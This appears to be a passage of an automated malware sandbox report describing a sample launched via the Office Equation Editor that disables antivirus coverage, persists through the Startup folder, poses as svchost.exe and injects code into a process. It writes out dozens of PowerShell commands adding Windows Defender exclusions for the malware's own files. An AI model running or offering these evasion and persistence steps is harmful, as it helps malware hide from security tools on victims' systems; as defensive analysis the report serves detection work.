                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\srt.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeMemory written: unknown base: 400000 value starts with: 4D5A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\srt.exeQueries volume information: C:\Users\user\AppData\Roaming\srt.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
